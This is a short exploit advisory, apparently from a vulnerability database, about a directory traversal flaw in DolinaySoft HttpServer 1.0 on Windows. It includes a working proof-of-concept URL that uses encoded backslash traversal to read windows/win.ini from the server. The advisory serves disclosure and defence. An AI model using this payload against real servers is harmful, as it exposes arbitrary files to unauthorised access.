HttpServer 1.0 Directory Traversal

Published
Credit
Risk
2017.03.20
malwrforensics
Medium
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
# Date: 2017-03-19
# Exploit Author: malwrforensics
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
# Version: 1.0
# Tested on: Windows

Exploiting this issue will allow an attacker to view arbitrary files
within the context of the web server.

Example:
Assuming the root folder is c:\<app_folder>\<html_folder>

http://<server>/..%5c..%5c/windows/win.ini


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com